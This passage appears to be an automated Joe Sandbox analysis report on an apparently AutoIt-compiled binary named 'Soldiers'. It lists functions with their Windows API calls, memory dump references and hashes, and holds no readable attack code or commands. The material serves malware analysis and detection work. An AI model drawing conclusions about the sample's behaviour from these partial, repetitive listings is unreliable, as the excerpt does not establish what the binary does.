                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: 4ad4c5464eeb583a5b7cc349b64c557b6ae1609ab9d9d3cff72e977b7309dc89
                                                          • Instruction ID: 2b30b9c1924c26ff1545bee39967c7a42f5ef9d74a75c6dec65986d45570f2b6
                                                          • Opcode Fuzzy Hash: 4ad4c5464eeb583a5b7cc349b64c557b6ae1609ab9d9d3cff72e977b7309dc89
                                                          • Instruction Fuzzy Hash: 36E0657265C248FBDF215F64AC097D83B15EB55331F048366FA7D980E1877145C0EB11
                                                          Function 00939330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00939339
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00938F04), ref: 00939340
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00938F04), ref: 0093934D
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00938F04), ref: 00939354
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: 029b28b10acfb2535b5f026bad154f32cb18a35f1cfc6dfbaa675c338079ee0b
                                                          • Instruction ID: c7309aa471b1bbc380c4c7aa91d7383cf818da1759906b50808589ea6cc9a743
                                                          • Opcode Fuzzy Hash: 029b28b10acfb2535b5f026bad154f32cb18a35f1cfc6dfbaa675c338079ee0b
                                                          • Instruction Fuzzy Hash: 5AE08673A15211DFD7201FB15D0DB967B6CEF907A1F104818B249DA090E7749484DB60
                                                          Function 00920679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00920679
                                                          • GetDC.USER32(00000000), ref: 00920683
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009206A3
                                                          • ReleaseDC.USER32(?,?,?,?,?), ref: 009206C4
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 7f84991e9b383561955b5588233c938f6f0bfa1e486b95836ab9f394b0152687
                                                          • Instruction ID: b8b5157556346f6c7a720c594e890cfeab00810a8a0c1bc70154fa8e00f2e3ee
                                                          • Opcode Fuzzy Hash: 7f84991e9b383561955b5588233c938f6f0bfa1e486b95836ab9f394b0152687
                                                          • Instruction Fuzzy Hash: 2AE01A72914208EFCB019F61D808A5D7BF5FBCC360F118505F95EE7210CB788591AF50
                                                          Function 0092068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 0092068D
                                                          • GetDC.USER32(00000000), ref: 00920697
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009206A3
                                                          • ReleaseDC.USER32(?,?,?,?,?), ref: 009206C4
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 1b072e232e27d6d63dbf5079486a152813a3effc943172b2713973d8e3f7edfb
                                                          • Instruction ID: 6e14ef22f6b8f0fa373c50140f76ce92feec24fb152f87cc05d17e86157273f7
                                                          • Opcode Fuzzy Hash: 1b072e232e27d6d63dbf5079486a152813a3effc943172b2713973d8e3f7edfb
                                                          • Instruction Fuzzy Hash: 53E012B2918208EFCB019FA1D808A9D7BF5FBCC360F108108F95EE7210CBB89591AF50
                                                          Function 00905FCC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __getptd_noexit.LIBCMT ref: 00905FCD
                                                            • Part of subcall function 00909BF4: GetLastError.KERNEL32(?,00901003,00908D5D,009059C3,?,?,00901003,?), ref: 00909BF6
                                                            • Part of subcall function 00909BF4: __calloc_crt.LIBCMT ref: 00909C17
                                                            • Part of subcall function 00909BF4: __initptd.LIBCMT ref: 00909C39
                                                            • Part of subcall function 00909BF4: GetCurrentThreadId.KERNEL32 ref: 00909C40
                                                            • Part of subcall function 00909BF4: SetLastError.KERNEL32(00000000,00901003,00908D5D,009059C3,?,?,00901003,?), ref: 00909C58
                                                          • CloseHandle.KERNEL32(?,?,00905FAC), ref: 00905FE1
                                                          • __freeptd.LIBCMT ref: 00905FE8
                                                          • ExitThread.KERNEL32 ref: 00905FF0
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                          • String ID:
                                                          • API String ID: 4169687693-0
                                                          • Opcode ID: e7df68311b4c08ef272ea6aef37bb30d63e7325b0103990eb0fe2d682b37cdff
                                                          • Instruction ID: 8d9c119f03f0159f3fb331232e73733cd522362ac282f229cfe821919fa00e72
                                                          • Opcode Fuzzy Hash: e7df68311b4c08ef272ea6aef37bb30d63e7325b0103990eb0fe2d682b37cdff
                                                          • Instruction Fuzzy Hash: 47D0A732406E51CFC2312734AC0DF1B32149F81B31F058204F169950F19B2488428A41
                                                          Function 008F278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,008F27AF,?,00000001), ref: 008F49F4
                                                          • _free.LIBCMT ref: 0092FB04
                                                          • _free.LIBCMT ref: 0092FB4B
                                                            • Part of subcall function 008F29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008F2ADF
                                                          Strings
                                                          • Bad directive syntax error, xrefs: 0092FB33
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: Bad directive syntax error
                                                          • API String ID: 2861923089-2118420937
                                                          • Opcode ID: 631e6d8532745e04ea1c64842dc608183e241e1afd20996eac7497ab4de545d1
                                                          • Instruction ID: 648a86b329912e7584893b9dfe640b9b743037dd37e719d21593b7028044c987
                                                          • Opcode Fuzzy Hash: 631e6d8532745e04ea1c64842dc608183e241e1afd20996eac7497ab4de545d1
                                                          • Instruction Fuzzy Hash: 82916F7191022DAFCF14EFA8D861AEEB7B8FF54310F10453AE915EB291EB349945CB50
                                                          Function 0093BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001,?,?,?), ref: 0093C057
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container
                                                          • API String ID: 3565006973-3941886329
                                                          • Opcode ID: fc06833df5efbf6faede470ea150b459d64c2e191d5f245d2537b48d5f34f824
                                                          • Instruction ID: 0c82182c293d6e7a4f0ee996e022bda238e3f72afe7b9dde59791e18257e2a4c
                                                          • Opcode Fuzzy Hash: fc06833df5efbf6faede470ea150b459d64c2e191d5f245d2537b48d5f34f824
                                                          • Instruction Fuzzy Hash: D49145B0604601EFDB24DF68C884B6ABBE9FF49700F24856DE94ADB291DB71E841CF50
                                                          Function 0094B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F436A: _wcscpy.LIBCMT ref: 008F438D
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          • __wcsnicmp.LIBCMT ref: 0094B670
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0094B739
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: 47d3e76322017d52277676f85cb6547bc3b388ea7b779729b69cc436c27b02c9
                                                          • Instruction ID: 46b8ce3524621d691924f488adf1d4a92a82b83997e0f73eec9c97c59c014296
                                                          • Opcode Fuzzy Hash: 47d3e76322017d52277676f85cb6547bc3b388ea7b779729b69cc436c27b02c9
                                                          • Instruction Fuzzy Hash: C7618175A04219AFDB14DFA8C891EAEB7B8FF48710F018159F54AAB391D770EE40CB51
                                                          Function 008EE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 008EE01E
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 008EE037
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: e56542a95e83e8b1f3a6d6d398ad63378e5dac649990be85dd7f17587d61e6b4
                                                          • Instruction ID: ba2ed142b3ebfc67bf919dbf1b741c6779b9fa8f01659199d7ca916d4ec88d7b
                                                          • Opcode Fuzzy Hash: e56542a95e83e8b1f3a6d6d398ad63378e5dac649990be85dd7f17587d61e6b4
                                                          • Instruction Fuzzy Hash: 3C515872518788ABE320AF55EC86BAFBBF8FB85314F41484DF1D8811A1DB719528CB17
                                                          Function 00949CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F4AB2: __fread_nolock.LIBCMT ref: 008F4AD0
                                                          • _wcscmp.LIBCMT ref: 00949DE1
                                                          • _wcscmp.LIBCMT ref: 00949DF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: bdd41a1aff4aab2f19aca23aee791bdebe24d3e00e887d8aaeab1e06363d3f29
                                                          • Instruction ID: 1e799b97fe08a4d376601b03574383f5662eb82a0e399381aca51b3c2f37f4c3
                                                          • Opcode Fuzzy Hash: bdd41a1aff4aab2f19aca23aee791bdebe24d3e00e887d8aaeab1e06363d3f29
                                                          • Instruction Fuzzy Hash: BF412831A00219BADF20DBA4CC45FEF77FDEF85710F00446AFA00E7184D675A9048B65
                                                          Function 00968096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000027,00001132,00000000,?,?,?,?), ref: 00968186
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0096819B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: 9fc560be8b2b6c4fb50970c6e6b9cf503fb9cdeda3395a819da6825b1cc0d9f6
                                                          • Instruction ID: c565cdfac4df34d592b57329ccdb4c366fce524b32c458ec0d1715b8a196236f
                                                          • Opcode Fuzzy Hash: 9fc560be8b2b6c4fb50970c6e6b9cf503fb9cdeda3395a819da6825b1cc0d9f6
                                                          • Instruction Fuzzy Hash: 96411B74A053099FDB14CF68C881BEABBB9FF09300F11456AE905EB351DB71A956CF90
                                                          Function 00952C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 00952C6A
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00952CA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: 7d6659d8275a097245017ff0609c6badc6c1088fec0f2161352798cd12ed200a
                                                          • Instruction ID: 17ae682f6cf957c190511e65070e4db1bd495652340d7d3da09cf6ae42dde3a6
                                                          • Opcode Fuzzy Hash: 7d6659d8275a097245017ff0609c6badc6c1088fec0f2161352798cd12ed200a
                                                          • Instruction Fuzzy Hash: D6311471C00219EBCF01EFA5CC85EEEBFB9FF19300F100059F915A6262EA355A56DBA1
                                                          Function 00967088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 0096713C
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00967178
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: a8e73489d60c50eb9e468c290e9c08810036563e21b6e5dca2901e0dd00e8563
                                                          • Instruction ID: 7600904226e5e7ec3dd0fd4acb61696a4c9e0721cf130657369d0405b80be096
                                                          • Opcode Fuzzy Hash: a8e73489d60c50eb9e468c290e9c08810036563e21b6e5dca2901e0dd00e8563
                                                          • Instruction Fuzzy Hash: 42317E71114604AAEB10DFB8CC81AFBB7ADFF89724F109619F9A9C7190DA31AC91D760
                                                          Function 00943049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 009430B8
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009430F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: dbdf8029e400f520acc76566e07e78dc39cccae38abc2496fdaa0299b4535b4d
                                                          • Instruction ID: 504b6fbb363f209f4fe0ed7ba068bd09c7244c9703213055284dbd1f31f136db
                                                          • Opcode Fuzzy Hash: dbdf8029e400f520acc76566e07e78dc39cccae38abc2496fdaa0299b4535b4d
                                                          • Instruction Fuzzy Hash: 48319131608205ABEB248F69CC85FAEBBBDEF4A350F148419E985A61A1D7709B44DB50
                                                          Function 009540B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 00954132
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                          • API String ID: 3506404897-2584243854
                                                          • Opcode ID: f4bcd4f8c6a65cebcb7d938c459a440d1c413e62d6888ef7c44ba232352e64d7
                                                          • Instruction ID: 30d88e6218bb892eec5d22ddb3cf442ab50d2adc6d233410d2e0dd95eb67dcc3
                                                          • Opcode Fuzzy Hash: f4bcd4f8c6a65cebcb7d938c459a440d1c413e62d6888ef7c44ba232352e64d7
                                                          • Instruction Fuzzy Hash: E2218130A0021DAFCF14EF79C885AAE7BB5FF94745F404454FA05EB281DB74A985CBA2
                                                          Function 00966CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?,?,?,Combobox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00966D86
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00966D91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
